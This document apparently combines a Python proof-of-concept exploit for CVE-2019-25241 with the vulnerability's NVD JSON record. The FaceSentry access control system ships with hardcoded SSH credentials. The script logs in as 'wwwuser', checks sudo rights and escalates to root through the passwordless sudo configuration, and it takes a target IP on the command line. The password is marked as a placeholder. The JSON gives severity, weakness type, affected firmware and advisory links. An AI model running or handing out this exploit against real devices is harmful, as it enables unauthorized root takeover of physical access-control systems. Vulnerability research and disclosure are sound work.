CVE-2019-25241

#!/usr/bin/env python3 """ CVE-2019-25241 PoC - FaceSentry SSH Hardcoded Credentials This PoC demonstrates the authentication bypass via hardcoded credentials. """ import socket import paramiko import sys def exploit_ssh(target_ip, port=22): """ Exploit hardcoded SSH credentials for FaceSentry Access Control System """ # Hardcoded credentials for wwwuser account username = "wwwuser" # The password is hardcoded in the system firmware password = "facesentry_default_pwd" # Placeholder - actual password found in firmware print(f"[*] Connecting to {target_ip}:{port}...") try: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # Attempt connection with hardcoded credentials ssh.connect(target_ip, port=port, username=username, password=password, timeout=10) print(f"[+] Successfully authenticated as {username}") # Check sudo privileges (no password required due to misconfiguration) stdin, stdout, stderr = ssh.exec_command("sudo -l") output = stdout.read().decode() print(f"[*] Sudo privileges: {output}") # Escalate to root stdin, stdout, stderr = ssh.exec_command("sudo su -c 'whoami'") output = stdout.read().decode().strip() print(f"[+] Current user after privilege escalation: {output}") ssh.close() return True except paramiko.AuthenticationException: print("[-] Authentication failed - credentials may have been changed") return False except Exception as e: print(f"[-] Connection error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip>") sys.exit(1) target = sys.argv[1] exploit_ssh(target)

{"cve": {"id": "CVE-2019-25241", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:51.993", "lastModified": "2025-12-31T14:15:50.723", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "FaceSentry Access Control System 6.4.8 contains a critical authentication vulnerability with hard-coded SSH credentials for the wwwuser account. Attackers can leverage the insecure sudoers configuration to escalate privileges and gain root access by executing sudo commands without authentication."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:5.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "C64B12CF-265E-4FD8-9BCF-95843E5A885B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:iwt:facesentry_access_control_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "EFE14646-6ED5-46DC-8A19-4F2358F784E5"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:5.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "A6913639-EBF7-4451-9052-71DB2B3DF925"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:iwt:facesentry_access_control_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "EFE14646-6ED5-46DC-8A19-4F2358F784E5"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:iwt:facesentry_access_control_system_firmware:6.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "26BA8B79-F65D-4D30-8827-B893F500BF8C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:iwt:facesentry_access_control_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "EFE14646-6ED5-46DC-8A19-4F2358F784E5"}]}]}], "references": [{"url": "http://www.iwt.com.hk", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/47067", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5526.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5526.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}